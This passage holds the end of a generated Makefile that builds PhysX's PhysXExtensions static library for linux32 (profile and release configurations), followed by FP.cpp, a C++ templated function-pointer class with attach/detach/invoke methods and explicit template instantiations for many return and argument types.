$(ECHO) PhysXExtensions: compiling profile $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cppfiles))...
mkdir -p $(dir $(@))
$(CXX) $(PhysXExtensions_profile_cppflags) -c $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cppfiles)) -o $@
@mkdir -p $(dir $(addprefix $(DEPSDIR)/PhysXExtensions/profile/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cppfiles))))))
cp $(PhysXExtensions_profile_DEPDIR).d $(addprefix $(DEPSDIR)/PhysXExtensions/profile/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cppfiles))))).P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_profile_DEPDIR).d >> $(addprefix $(DEPSDIR)/PhysXExtensions/profile/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cppfiles))))).P; \
rm -f $(PhysXExtensions_profile_DEPDIR).d
# NOTE(review): the .cc rule stores .P files directly under $(DEPSDIR) with a
# .profile.P suffix, unlike the .cpp/.c rules; generator quirk.
$(PhysXExtensions_profile_cc_o): $(PhysXExtensions_profile_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling profile $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_ccfiles))...
mkdir -p $(dir $(@))
$(CXX) $(PhysXExtensions_profile_cppflags) -c $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_ccfiles)) -o $@
mkdir -p $(dir $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_ccfiles))))))
cp $(PhysXExtensions_profile_DEPDIR).d $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_ccfiles))))).profile.P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_profile_DEPDIR).d >> $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_ccfiles))))).profile.P; \
rm -f $(PhysXExtensions_profile_DEPDIR).d
$(PhysXExtensions_profile_c_o): $(PhysXExtensions_profile_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling profile $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cfiles))...
mkdir -p $(dir $(@))
$(CC) $(PhysXExtensions_profile_cflags) -c $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cfiles)) -o $@
@mkdir -p $(dir $(addprefix $(DEPSDIR)/PhysXExtensions/profile/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cfiles))))))
cp $(PhysXExtensions_profile_DEPDIR).d $(addprefix $(DEPSDIR)/PhysXExtensions/profile/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cfiles))))).P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_profile_DEPDIR).d >> $(addprefix $(DEPSDIR)/PhysXExtensions/profile/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cfiles))))).P; \
rm -f $(PhysXExtensions_profile_DEPDIR).d
# ---------------------------------------------------------------------------
# PhysXExtensions "release" configuration: fully optimized build with PVD
# support compiled out (PX_SUPPORT_PVD=0).  Same generated per-config pattern
# as the sections above.
# ---------------------------------------------------------------------------
# Header search paths for this configuration.
PhysXExtensions_release_hpaths :=
PhysXExtensions_release_hpaths += ./../../Common/include
PhysXExtensions_release_hpaths += ./../../../../PxShared/include
PhysXExtensions_release_hpaths += ./../../../../PxShared/src/foundation/include
PhysXExtensions_release_hpaths += ./../../../../PxShared/src/fastxml/include
PhysXExtensions_release_hpaths += ./../../../../PxShared/src/pvd/include
PhysXExtensions_release_hpaths += ./../../../Include/common
PhysXExtensions_release_hpaths += ./../../../Include/geometry
PhysXExtensions_release_hpaths += ./../../../Include/GeomUtils
PhysXExtensions_release_hpaths += ./../../../Include/pvd
PhysXExtensions_release_hpaths += ./../../../Include/cooking
PhysXExtensions_release_hpaths += ./../../../Include/extensions
PhysXExtensions_release_hpaths += ./../../../Include/vehicle
PhysXExtensions_release_hpaths += ./../../../Include/cloth
PhysXExtensions_release_hpaths += ./../../../Include
PhysXExtensions_release_hpaths += ./../../Common/src
PhysXExtensions_release_hpaths += ./../../GeomUtils/headers
PhysXExtensions_release_hpaths += ./../../GeomUtils/src
PhysXExtensions_release_hpaths += ./../../GeomUtils/src/contact
PhysXExtensions_release_hpaths += ./../../GeomUtils/src/common
PhysXExtensions_release_hpaths += ./../../GeomUtils/src/convex
PhysXExtensions_release_hpaths += ./../../GeomUtils/src/distance
PhysXExtensions_release_hpaths += ./../../GeomUtils/src/gjk
PhysXExtensions_release_hpaths += ./../../GeomUtils/src/intersection
PhysXExtensions_release_hpaths += ./../../GeomUtils/src/mesh
PhysXExtensions_release_hpaths += ./../../GeomUtils/src/hf
PhysXExtensions_release_hpaths += ./../../GeomUtils/src/pcm
PhysXExtensions_release_hpaths += ./../../PhysXMetaData/core/include
PhysXExtensions_release_hpaths += ./../../PhysXMetaData/extensions/include
PhysXExtensions_release_hpaths += ./../../PhysXExtensions/src
PhysXExtensions_release_hpaths += ./../../PhysXExtensions/src/serialization/Xml
PhysXExtensions_release_hpaths += ./../../PhysXExtensions/src/serialization/Binary
PhysXExtensions_release_hpaths += ./../../PhysXExtensions/src/serialization/File
PhysXExtensions_release_hpaths += ./../../PvdSDK/src
PhysXExtensions_release_hpaths += ./../../PhysX/src
# Library search paths.
PhysXExtensions_release_lpaths :=
PhysXExtensions_release_lpaths += ./../../../../PxShared/lib/linux32
# Preprocessor defines; note PX_SUPPORT_PVD=0 (PVD disabled) in release.
PhysXExtensions_release_defines := $(PhysXExtensions_custom_defines)
PhysXExtensions_release_defines += PX_BUILD_NUMBER=0
PhysXExtensions_release_defines += PX_PHYSX_STATIC_LIB
PhysXExtensions_release_defines += NDEBUG
PhysXExtensions_release_defines += PX_SUPPORT_PVD=0
# Libraries to link (plain release flavour of PsFastXml).
PhysXExtensions_release_libraries :=
PhysXExtensions_release_libraries += PsFastXml
# Compiler flags shared by the C and C++ compiles of this config.
PhysXExtensions_release_common_cflags := $(PhysXExtensions_custom_cflags)
PhysXExtensions_release_common_cflags += -MMD
PhysXExtensions_release_common_cflags += $(addprefix -D, $(PhysXExtensions_release_defines))
PhysXExtensions_release_common_cflags += $(addprefix -I, $(PhysXExtensions_release_hpaths))
PhysXExtensions_release_common_cflags += -m32
PhysXExtensions_release_common_cflags += -Werror -m32 -fPIC -msse2 -mfpmath=sse -malign-double -fno-exceptions -fno-rtti -fvisibility=hidden -fvisibility-inlines-hidden
PhysXExtensions_release_common_cflags += -Wall -Wextra -Wstrict-aliasing=2 -fdiagnostics-show-option
PhysXExtensions_release_common_cflags += -Wno-invalid-offsetof -Wno-uninitialized -Wno-implicit-fallthrough
PhysXExtensions_release_common_cflags += -Wno-missing-field-initializers
PhysXExtensions_release_common_cflags += -O3 -fno-strict-aliasing
PhysXExtensions_release_cflags := $(PhysXExtensions_release_common_cflags)
PhysXExtensions_release_cppflags := $(PhysXExtensions_release_common_cflags)
# Linker flags (32-bit link, grouped libs, librt).
PhysXExtensions_release_lflags := $(PhysXExtensions_custom_lflags)
PhysXExtensions_release_lflags += $(addprefix -L, $(PhysXExtensions_release_lpaths))
PhysXExtensions_release_lflags += -Wl,--start-group $(addprefix -l, $(PhysXExtensions_release_libraries)) -Wl,--end-group
PhysXExtensions_release_lflags += -lrt
PhysXExtensions_release_lflags += -m32
# Object directory and per-suffix object lists mirrored from the source tree.
PhysXExtensions_release_objsdir = $(OBJS_DIR)/PhysXExtensions_release
PhysXExtensions_release_cpp_o = $(addprefix $(PhysXExtensions_release_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.cpp, %.cpp.o, $(PhysXExtensions_cppfiles)))))
PhysXExtensions_release_cc_o = $(addprefix $(PhysXExtensions_release_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.cc, %.cc.o, $(PhysXExtensions_ccfiles)))))
PhysXExtensions_release_c_o = $(addprefix $(PhysXExtensions_release_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.c, %.c.o, $(PhysXExtensions_cfiles)))))
PhysXExtensions_release_obj = $(PhysXExtensions_release_cpp_o) $(PhysXExtensions_release_cc_o) $(PhysXExtensions_release_c_o)
# Static library produced by this configuration.
PhysXExtensions_release_bin := ./../../../Lib/linux32/libPhysX3Extensions.a
# Remove the objects, the archive and the dependency files for this config.
clean_PhysXExtensions_release:
@$(ECHO) clean PhysXExtensions release
@$(RMDIR) $(PhysXExtensions_release_objsdir)
@$(RMDIR) $(PhysXExtensions_release_bin)
@$(RMDIR) $(DEPSDIR)/PhysXExtensions/release
# Build phase chain: build -> postbuild -> mainbuild -> (prebuild, archive).
build_PhysXExtensions_release: postbuild_PhysXExtensions_release
postbuild_PhysXExtensions_release: mainbuild_PhysXExtensions_release
mainbuild_PhysXExtensions_release: prebuild_PhysXExtensions_release $(PhysXExtensions_release_bin)
prebuild_PhysXExtensions_release:
# Archive every object into the static library (requires PsFastXml release).
$(PhysXExtensions_release_bin): $(PhysXExtensions_release_obj) build_PsFastXml_release
mkdir -p `dirname ./../../../Lib/linux32/libPhysX3Extensions.a`
@$(AR) rcs $(PhysXExtensions_release_bin) $(PhysXExtensions_release_obj)
$(ECHO) building $@ complete!
# Per-object dependency-file location ($(*F) is the stem of the matched target).
PhysXExtensions_release_DEPDIR = $(dir $(@))/$(*F)
# Compile rules: recover each source path from its object path, compile, then
# rewrite the compiler's .d into a .P with empty per-header rules.
$(PhysXExtensions_release_cpp_o): $(PhysXExtensions_release_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling release $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cppfiles))...
mkdir -p $(dir $(@))
$(CXX) $(PhysXExtensions_release_cppflags) -c $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cppfiles)) -o $@
@mkdir -p $(dir $(addprefix $(DEPSDIR)/PhysXExtensions/release/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cppfiles))))))
cp $(PhysXExtensions_release_DEPDIR).d $(addprefix $(DEPSDIR)/PhysXExtensions/release/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cppfiles))))).P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_release_DEPDIR).d >> $(addprefix $(DEPSDIR)/PhysXExtensions/release/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cppfiles))))).P; \
rm -f $(PhysXExtensions_release_DEPDIR).d
# NOTE(review): the .cc rule stores .P files directly under $(DEPSDIR) with a
# .release.P suffix, unlike the .cpp/.c rules; generator quirk.
$(PhysXExtensions_release_cc_o): $(PhysXExtensions_release_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling release $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_ccfiles))...
mkdir -p $(dir $(@))
$(CXX) $(PhysXExtensions_release_cppflags) -c $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_ccfiles)) -o $@
mkdir -p $(dir $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_ccfiles))))))
cp $(PhysXExtensions_release_DEPDIR).d $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_ccfiles))))).release.P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_release_DEPDIR).d >> $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_ccfiles))))).release.P; \
rm -f $(PhysXExtensions_release_DEPDIR).d
$(PhysXExtensions_release_c_o): $(PhysXExtensions_release_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling release $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cfiles))...
mkdir -p $(dir $(@))
$(CC) $(PhysXExtensions_release_cflags) -c $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cfiles)) -o $@
@mkdir -p $(dir $(addprefix $(DEPSDIR)/PhysXExtensions/release/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cfiles))))))
cp $(PhysXExtensions_release_DEPDIR).d $(addprefix $(DEPSDIR)/PhysXExtensions/release/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cfiles))))).P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_release_DEPDIR).d >> $(addprefix $(DEPSDIR)/PhysXExtensions/release/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cfiles))))).P; \
rm -f $(PhysXExtensions_release_DEPDIR).d
# Aggregate clean: remove every configuration's outputs, then wipe the whole
# dependency-file tree.
clean_PhysXExtensions: clean_PhysXExtensions_debug clean_PhysXExtensions_checked clean_PhysXExtensions_profile clean_PhysXExtensions_release
rm -rf $(DEPSDIR)
# Propagate VERBOSE to sub-makes; unless it is set, suppress command echoing.
export VERBOSE
ifndef VERBOSE
.SILENT:
endif
| {
"pile_set_name": "Github"
} |
/**
* @file FP.cpp
* @brief Core Utility - Templated Function Pointer Class
* @author sam grove
* @version 1.0
* @see
*
* Copyright (c) 2013
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "FP.h"
#include <stdint.h>
/** Construct a detached function pointer: neither an object/member pair
 *  nor a plain C callback is bound until attach() is called.
 */
template<class retT, class argT>
FP<retT, argT>::FP()
    : obj_callback(0),
      c_callback(0)
{
}
/** @returns true when either dispatch target (object/member pair or
 *  plain C callback) is currently bound.
 */
template<class retT, class argT>
bool FP<retT, argT>::attached()
{
    return (0 != obj_callback) || (0 != c_callback);
}
/** Unbind both possible dispatch targets; attached() reports false and
 *  operator() becomes a no-op returning a zero value afterwards.
 */
template<class retT, class argT>
void FP<retT, argT>::detach()
{
    c_callback = 0;
    obj_callback = 0;
}
/** Attach a plain C function as the callback.
 *  @param function  Function to invoke from operator().
 *
 *  Also clears any previously attached object/member pair: the dispatch
 *  in operator() prefers obj_callback when it is non-zero, so without
 *  this reset a later attach() of a C function would never take effect.
 */
template<class retT, class argT>
void FP<retT, argT>::attach(retT (*function)(argT))
{
    obj_callback = 0;
    c_callback = function;
}
/** Invoke the attached callback.
 *  @param arg  Argument forwarded to the callback.
 *  @returns the callback's result, or a zero-initialized retT when
 *           nothing is attached.
 *
 *  Fix: the guard previously tested only c_callback, which made the
 *  obj_callback branch of the ternary unreachable when only an
 *  object/member callback was attached (the constructor, detach() and
 *  attached() all treat the two pointers as independent). The guard now
 *  accepts either dispatch target.
 */
template<class retT, class argT>
retT FP<retT, argT>::operator()(argT arg) const
{
    if( 0 != c_callback || 0 != obj_callback )
    {
        return obj_callback ? (obj_callback->*method_callback)(arg) : (*c_callback)(arg);
    }
    return (retT)0;
}
// pre-define the types for the linker
//
// Explicit template instantiations: the template method definitions live
// in this .cpp file, so every <retT, argT> combination a client may use
// must be instantiated here for the linker to resolve it. Each group
// below fixes one return type and enumerates the argument types
// (char, the <stdint.h> fixed-width integers, bool, float, double, and
// pointers to each).
// retT = void (this group also accepts a void* argument)
template class FP<void,char>;
template class FP<void,char*>;
template class FP<void,int8_t>;
template class FP<void,int8_t*>;
template class FP<void,uint8_t>;
template class FP<void,uint8_t*>;
template class FP<void,int16_t>;
template class FP<void,int16_t*>;
template class FP<void,uint16_t>;
template class FP<void,uint16_t*>;
template class FP<void,int32_t>;
template class FP<void,int32_t*>;
template class FP<void,uint32_t>;
template class FP<void,uint32_t*>;
template class FP<void,int64_t>;
template class FP<void,int64_t*>;
template class FP<void,uint64_t>;
template class FP<void,uint64_t*>;
template class FP<void,bool>;
template class FP<void,bool*>;
template class FP<void,float>;
template class FP<void,float*>;
template class FP<void,double>;
template class FP<void,double*>;
template class FP<void,void*>;
// retT = int8_t
template class FP<int8_t,char>;
template class FP<int8_t,char*>;
template class FP<int8_t,int8_t>;
template class FP<int8_t,int8_t*>;
template class FP<int8_t,uint8_t>;
template class FP<int8_t,uint8_t*>;
template class FP<int8_t,int16_t>;
template class FP<int8_t,int16_t*>;
template class FP<int8_t,uint16_t>;
template class FP<int8_t,uint16_t*>;
template class FP<int8_t,int32_t>;
template class FP<int8_t,int32_t*>;
template class FP<int8_t,uint32_t>;
template class FP<int8_t,uint32_t*>;
template class FP<int8_t,int64_t>;
template class FP<int8_t,int64_t*>;
template class FP<int8_t,uint64_t>;
template class FP<int8_t,uint64_t*>;
template class FP<int8_t,bool>;
template class FP<int8_t,bool*>;
template class FP<int8_t,float>;
template class FP<int8_t,float*>;
template class FP<int8_t,double>;
template class FP<int8_t,double*>;
// retT = int8_t*
template class FP<int8_t*,char>;
template class FP<int8_t*,char*>;
template class FP<int8_t*,int8_t>;
template class FP<int8_t*,int8_t*>;
template class FP<int8_t*,uint8_t>;
template class FP<int8_t*,uint8_t*>;
template class FP<int8_t*,int16_t>;
template class FP<int8_t*,int16_t*>;
template class FP<int8_t*,uint16_t>;
template class FP<int8_t*,uint16_t*>;
template class FP<int8_t*,int32_t>;
template class FP<int8_t*,int32_t*>;
template class FP<int8_t*,uint32_t>;
template class FP<int8_t*,uint32_t*>;
template class FP<int8_t*,int64_t>;
template class FP<int8_t*,int64_t*>;
template class FP<int8_t*,uint64_t>;
template class FP<int8_t*,uint64_t*>;
template class FP<int8_t*,bool>;
template class FP<int8_t*,bool*>;
template class FP<int8_t*,float>;
template class FP<int8_t*,float*>;
template class FP<int8_t*,double>;
template class FP<int8_t*,double*>;
// retT = uint8_t
template class FP<uint8_t,char>;
template class FP<uint8_t,char*>;
template class FP<uint8_t,int8_t>;
template class FP<uint8_t,int8_t*>;
template class FP<uint8_t,uint8_t>;
template class FP<uint8_t,uint8_t*>;
template class FP<uint8_t,int16_t>;
template class FP<uint8_t,int16_t*>;
template class FP<uint8_t,uint16_t>;
template class FP<uint8_t,uint16_t*>;
template class FP<uint8_t,int32_t>;
template class FP<uint8_t,int32_t*>;
template class FP<uint8_t,uint32_t>;
template class FP<uint8_t,uint32_t*>;
template class FP<uint8_t,int64_t>;
template class FP<uint8_t,int64_t*>;
template class FP<uint8_t,uint64_t>;
template class FP<uint8_t,uint64_t*>;
template class FP<uint8_t,bool>;
template class FP<uint8_t,bool*>;
template class FP<uint8_t,float>;
template class FP<uint8_t,float*>;
template class FP<uint8_t,double>;
template class FP<uint8_t,double*>;
// retT = uint8_t*
template class FP<uint8_t*,char>;
template class FP<uint8_t*,char*>;
template class FP<uint8_t*,int8_t>;
template class FP<uint8_t*,int8_t*>;
template class FP<uint8_t*,uint8_t>;
template class FP<uint8_t*,uint8_t*>;
template class FP<uint8_t*,int16_t>;
template class FP<uint8_t*,int16_t*>;
template class FP<uint8_t*,uint16_t>;
template class FP<uint8_t*,uint16_t*>;
template class FP<uint8_t*,int32_t>;
template class FP<uint8_t*,int32_t*>;
template class FP<uint8_t*,uint32_t>;
template class FP<uint8_t*,uint32_t*>;
template class FP<uint8_t*,int64_t>;
template class FP<uint8_t*,int64_t*>;
template class FP<uint8_t*,uint64_t>;
template class FP<uint8_t*,uint64_t*>;
template class FP<uint8_t*,bool>;
template class FP<uint8_t*,bool*>;
template class FP<uint8_t*,float>;
template class FP<uint8_t*,float*>;
template class FP<uint8_t*,double>;
template class FP<uint8_t*,double*>;
// retT = int16_t
template class FP<int16_t,char>;
template class FP<int16_t,char*>;
template class FP<int16_t,int8_t>;
template class FP<int16_t,int8_t*>;
template class FP<int16_t,uint8_t>;
template class FP<int16_t,uint8_t*>;
template class FP<int16_t,int16_t>;
template class FP<int16_t,int16_t*>;
template class FP<int16_t,uint16_t>;
template class FP<int16_t,uint16_t*>;
template class FP<int16_t,int32_t>;
template class FP<int16_t,int32_t*>;
template class FP<int16_t,uint32_t>;
template class FP<int16_t,uint32_t*>;
template class FP<int16_t,int64_t>;
template class FP<int16_t,int64_t*>;
template class FP<int16_t,uint64_t>;
template class FP<int16_t,uint64_t*>;
template class FP<int16_t,bool>;
template class FP<int16_t,bool*>;
template class FP<int16_t,float>;
template class FP<int16_t,float*>;
template class FP<int16_t,double>;
template class FP<int16_t,double*>;
// retT = int16_t*
template class FP<int16_t*,char>;
template class FP<int16_t*,char*>;
template class FP<int16_t*,int8_t>;
template class FP<int16_t*,int8_t*>;
template class FP<int16_t*,uint8_t>;
template class FP<int16_t*,uint8_t*>;
template class FP<int16_t*,int16_t>;
template class FP<int16_t*,int16_t*>;
template class FP<int16_t*,uint16_t>;
template class FP<int16_t*,uint16_t*>;
template class FP<int16_t*,int32_t>;
template class FP<int16_t*,int32_t*>;
template class FP<int16_t*,uint32_t>;
template class FP<int16_t*,uint32_t*>;
template class FP<int16_t*,int64_t>;
template class FP<int16_t*,int64_t*>;
template class FP<int16_t*,uint64_t>;
template class FP<int16_t*,uint64_t*>;
template class FP<int16_t*,bool>;
template class FP<int16_t*,bool*>;
template class FP<int16_t*,float>;
template class FP<int16_t*,float*>;
template class FP<int16_t*,double>;
template class FP<int16_t*,double*>;
// retT = uint16_t
template class FP<uint16_t,char>;
template class FP<uint16_t,char*>;
template class FP<uint16_t,int8_t>;
template class FP<uint16_t,int8_t*>;
template class FP<uint16_t,uint8_t>;
template class FP<uint16_t,uint8_t*>;
template class FP<uint16_t,int16_t>;
template class FP<uint16_t,int16_t*>;
template class FP<uint16_t,uint16_t>;
template class FP<uint16_t,uint16_t*>;
template class FP<uint16_t,int32_t>;
template class FP<uint16_t,int32_t*>;
template class FP<uint16_t,uint32_t>;
template class FP<uint16_t,uint32_t*>;
template class FP<uint16_t,int64_t>;
template class FP<uint16_t,int64_t*>;
template class FP<uint16_t,uint64_t>;
template class FP<uint16_t,uint64_t*>;
template class FP<uint16_t,bool>;
template class FP<uint16_t,bool*>;
template class FP<uint16_t,float>;
template class FP<uint16_t,float*>;
template class FP<uint16_t,double>;
template class FP<uint16_t,double*>;
// retT = uint16_t*
template class FP<uint16_t*,char>;
template class FP<uint16_t*,char*>;
template class FP<uint16_t*,int8_t>;
template class FP<uint16_t*,int8_t*>;
template class FP<uint16_t*,uint8_t>;
template class FP<uint16_t*,uint8_t*>;
template class FP<uint16_t*,int16_t>;
template class FP<uint16_t*,int16_t*>;
template class FP<uint16_t*,uint16_t>;
template class FP<uint16_t*,uint16_t*>;
template class FP<uint16_t*,int32_t>;
template class FP<uint16_t*,int32_t*>;
template class FP<uint16_t*,uint32_t>;
template class FP<uint16_t*,uint32_t*>;
template class FP<uint16_t*,int64_t>;
template class FP<uint16_t*,int64_t*>;
template class FP<uint16_t*,uint64_t>;
template class FP<uint16_t*,uint64_t*>;
template class FP<uint16_t*,bool>;
template class FP<uint16_t*,bool*>;
template class FP<uint16_t*,float>;
template class FP<uint16_t*,float*>;
template class FP<uint16_t*,double>;
template class FP<uint16_t*,double*>;
// retT = int32_t
template class FP<int32_t,char>;
template class FP<int32_t,char*>;
template class FP<int32_t,int8_t>;
template class FP<int32_t,int8_t*>;
template class FP<int32_t,uint8_t>;
template class FP<int32_t,uint8_t*>;
template class FP<int32_t,int16_t>;
template class FP<int32_t,int16_t*>;
template class FP<int32_t,uint16_t>;
template class FP<int32_t,uint16_t*>;
template class FP<int32_t,int32_t>;
template class FP<int32_t,int32_t*>;
template class FP<int32_t,uint32_t>;
template class FP<int32_t,uint32_t*>;
template class FP<int32_t,int64_t>;
template class FP<int32_t,int64_t*>;
template class FP<int32_t,uint64_t>;
template class FP<int32_t,uint64_t*>;
template class FP<int32_t,bool>;
template class FP<int32_t,bool*>;
template class FP<int32_t,float>;
template class FP<int32_t,float*>;
template class FP<int32_t,double>;
template class FP<int32_t,double*>;
// retT = int32_t*
template class FP<int32_t*,char>;
template class FP<int32_t*,char*>;
template class FP<int32_t*,int8_t>;
template class FP<int32_t*,int8_t*>;
template class FP<int32_t*,uint8_t>;
template class FP<int32_t*,uint8_t*>;
template class FP<int32_t*,int16_t>;
template class FP<int32_t*,int16_t*>;
template class FP<int32_t*,uint16_t>;
template class FP<int32_t*,uint16_t*>;
template class FP<int32_t*,int32_t>;
template class FP<int32_t*,int32_t*>;
template class FP<int32_t*,uint32_t>;
template class FP<int32_t*,uint32_t*>;
template class FP<int32_t*,int64_t>;
template class FP<int32_t*,int64_t*>;
template class FP<int32_t*,uint64_t>;
template class FP<int32_t*,uint64_t*>;
template class FP<int32_t*,bool>;
template class FP<int32_t*,bool*>;
template class FP<int32_t*,float>;
template class FP<int32_t*,float*>;
template class FP<int32_t*,double>;
template class FP<int32_t*,double*>;
// retT = uint32_t
template class FP<uint32_t,char>;
template class FP<uint32_t,char*>;
template class FP<uint32_t,int8_t>;
template class FP<uint32_t,int8_t*>;
template class FP<uint32_t,uint8_t>;
template class FP<uint32_t,uint8_t*>;
template class FP<uint32_t,int16_t>;
template class FP<uint32_t,int16_t*>;
template class FP<uint32_t,uint16_t>;
template class FP<uint32_t,uint16_t*>;
template class FP<uint32_t,int32_t>;
template class FP<uint32_t,int32_t*>;
template class FP<uint32_t,uint32_t>;
template class FP<uint32_t,uint32_t*>;
template class FP<uint32_t,int64_t>;
template class FP<uint32_t,int64_t*>;
template class FP<uint32_t,uint64_t>;
template class FP<uint32_t,uint64_t*>;
template class FP<uint32_t,bool>;
template class FP<uint32_t,bool*>;
template class FP<uint32_t,float>;
template class FP<uint32_t,float*>;
template class FP<uint32_t,double>;
template class FP<uint32_t,double*>;
// retT = uint32_t*
template class FP<uint32_t*,char>;
template class FP<uint32_t*,char*>;
template class FP<uint32_t*,int8_t>;
template class FP<uint32_t*,int8_t*>;
template class FP<uint32_t*,uint8_t>;
template class FP<uint32_t*,uint8_t*>;
template class FP<uint32_t*,int16_t>;
template class FP<uint32_t*,int16_t*>;
template class FP<uint32_t*,uint16_t>;
template class FP<uint32_t*,uint16_t*>;
template class FP<uint32_t*,int32_t>;
template class FP<uint32_t*,int32_t*>;
template class FP<uint32_t*,uint32_t>;
template class FP<uint32_t*,uint32_t*>;
template class FP<uint32_t*,int64_t>;
template class FP<uint32_t*,int64_t*>;
template class FP<uint32_t*,uint64_t>;
template class FP<uint32_t*,uint64_t*>;
template class FP<uint32_t*,bool>;
template class FP<uint32_t*,bool*>;
template class FP<uint32_t*,float>;
template class FP<uint32_t*,float*>;
template class FP<uint32_t*,double>;
template class FP<uint32_t*,double*>;
// retT = int64_t
template class FP<int64_t,char>;
template class FP<int64_t,char*>;
template class FP<int64_t,int8_t>;
template class FP<int64_t,int8_t*>;
template class FP<int64_t,uint8_t>;
template class FP<int64_t,uint8_t*>;
template class FP<int64_t,int16_t>;
template class FP<int64_t,int16_t*>;
template class FP<int64_t,uint16_t>;
